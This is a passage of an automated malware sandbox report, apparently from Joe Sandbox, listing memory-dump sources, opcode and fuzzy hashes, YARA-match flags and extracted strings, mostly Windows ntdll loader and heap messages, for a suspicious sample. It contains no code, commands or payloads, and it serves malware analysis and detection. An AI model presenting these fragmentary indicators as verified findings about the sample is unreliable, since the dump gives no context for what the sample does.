                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 39$gfff$gfff$yxxx
                                                                                                          • API String ID: 0-704807470
                                                                                                          • Opcode ID: 43ab4fd87e2d4637121be45053084905740c616ec4f7ce72840a3f606378f5da
                                                                                                          • Instruction ID: 810ef13b2267378f74311cdb08c152e100bec7a9c8912a15d6d4c4a6af329c53
                                                                                                          • Opcode Fuzzy Hash: 43ab4fd87e2d4637121be45053084905740c616ec4f7ce72840a3f606378f5da
                                                                                                          • Instruction Fuzzy Hash: FF71B432B0050E47DB2C8D5DC8902B9B362FBD0315F1AC239DA5ADF394E634AE518BE0
                                                                                                          Strings
                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01093456
                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01093437
                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0109342A
                                                                                                          • RtlDeactivateActivationContext, xrefs: 01093425, 01093432, 01093451
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                          • API String ID: 0-1245972979
                                                                                                          • Opcode ID: 9de0998583ee7b1c1fcfd9f53477e08fbde17eb882221f3722874b1e595d8253
                                                                                                          • Instruction ID: 85547484b671e9fa9035975094b9aa0682bc0f1d6c509d542c889377a73766ed
                                                                                                          • Opcode Fuzzy Hash: 9de0998583ee7b1c1fcfd9f53477e08fbde17eb882221f3722874b1e595d8253
                                                                                                          • Instruction Fuzzy Hash: 7B6125366047129BDBA28F28C855BABB7E4BF80B10F158559E8D5DF240DB70E840CB91
                                                                                                          Strings
                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01080FE5
                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01081028
                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010810AE
                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0108106B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                          • API String ID: 0-1468400865
                                                                                                          • Opcode ID: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                                                                          • Instruction ID: 28cfc9e5c18e4d708e589fcec3ff5857b3fb2ea0bc9253d61d878f8475a5e5eb
                                                                                                          • Opcode Fuzzy Hash: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                                                                          • Instruction Fuzzy Hash: 6E71F1B19083259FDB61EF14C884B9B7BE8AF95764F4044A8FDC88B14AD335D188CBD1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3Q$gfff$gfff$gfff
                                                                                                          • API String ID: 0-3898621068
                                                                                                          • Opcode ID: 414b566fd9a60026bd5511049a019749b7d1ab39f84b7fbd729a6d906c590ad3
                                                                                                          • Instruction ID: de14b7198cc952450481659282038b78cc093f15778a78f9c684288753304b3e
                                                                                                          • Opcode Fuzzy Hash: 414b566fd9a60026bd5511049a019749b7d1ab39f84b7fbd729a6d906c590ad3
                                                                                                          • Instruction Fuzzy Hash: 71412B3AB0010D87DB2C89AED8522B9B352E7E0354F6ED239DE1ACF3D0E535ED0146A5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3Q$gfff$gfff$gfff
                                                                                                          • API String ID: 0-3898621068
                                                                                                          • Opcode ID: 868cd322ec5d45e48bfb5f1f6254eca0e7b4eafe6a573c1366067ba67a03ec86
                                                                                                          • Instruction ID: f3ec21e11ca9e4907ac84194225b6cf167cc7713a1eab173829c850fe8742be7
                                                                                                          • Opcode Fuzzy Hash: 868cd322ec5d45e48bfb5f1f6254eca0e7b4eafe6a573c1366067ba67a03ec86
                                                                                                          • Instruction Fuzzy Hash: 32311535B0010D87DB2C89AED8522BDB752E7D0310F1ED239DE5ACF280D535ED0186A5
                                                                                                          Strings
                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 0109365C
                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01093640, 0109366C
                                                                                                          • LdrpFindDllActivationContext, xrefs: 01093636, 01093662
                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0109362F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                          • API String ID: 0-3779518884
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A9A2
                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0108A992
                                                                                                          • LdrpDynamicShimModule, xrefs: 0108A998
                                                                                                          • apphelp.dll, xrefs: 01042462
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-176724104
                                                                                                          Strings
                                                                                                          • HEAP: , xrefs: 01033264
                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0103327D
                                                                                                          • HEAP[%wZ]: , xrefs: 01033255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                          • API String ID: 0-617086771
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                                          • API String ID: 0-1670051934
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-4253913091
                                                                                                          Strings
                                                                                                          • HEAP: , xrefs: 01021596
                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01021728
                                                                                                          • HEAP[%wZ]: , xrefs: 01021712
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                          • API String ID: 0-3178619729
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $@
                                                                                                          • API String ID: 0-1077428164
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                          • API String ID: 0-2779062949
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A121
                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0108A10F
                                                                                                          • LdrpCheckModule, xrefs: 0108A117
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-161242083
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-1334570610
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010982E8
                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 010982DE
                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 010982D7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1783798831
                                                                                                          Strings
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010DC1C5
                                                                                                          • @, xrefs: 010DC1F1
                                                                                                          • PreferredUILanguages, xrefs: 010DC212
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                          • API String ID: 0-2968386058
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                          • API String ID: 0-1373925480
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010A4899
                                                                                                          • LdrpCheckRedirection, xrefs: 010A488F
                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010A4888
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-3154609507
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-2558761708
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010A2104
                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 010A20F3
                                                                                                          • LdrpInitializationFailure, xrefs: 010A20FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2986994758
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: #%u
                                                                                                          • API String ID: 48624451-232158463
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@
                                                                                                          • API String ID: 0-149943524
                                                                                                          Strings
                                                                                                          • LdrResSearchResource Exit, xrefs: 0102AA25
                                                                                                          • LdrResSearchResource Enter, xrefs: 0102AA13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                          • API String ID: 0-4066393604
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: `$`
                                                                                                          • API String ID: 0-197956300
                                                                                                          Strings
                                                                                                          • Failed to retrieve service checksum., xrefs: 0107EE56
                                                                                                          • ResIdCount less than 2., xrefs: 0107EEC9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                          • API String ID: 0-863616075
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: R}$qU/b
                                                                                                          • API String ID: 0-2727322496
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Legacy$UEFI
                                                                                                          • API String ID: 2994545307-634100481
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$MUI
                                                                                                          • API String ID: 0-17815947
                                                                                                          Strings
                                                                                                          • kLsE, xrefs: 01020540
                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0102063D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                          • API String ID: 0-2547482624
                                                                                                          Strings
                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0102A309
                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0102A2FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                          • API String ID: 0-2876891731
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: MUI
                                                                                                          • API String ID: 0-1339004836
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: P`vRbv
                                                                                                          • API String ID: 0-2392986850
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 0-4108050209
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PATH
                                                                                                          • API String ID: 0-1036084923
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aullrem
                                                                                                          • String ID:
                                                                                                          • API String ID: 3758378126-0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GlobalTags
                                                                                                          • API String ID: 0-1106856819
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: gfff
                                                                                                          • API String ID: 0-1553575800
                                                                                                          Strings
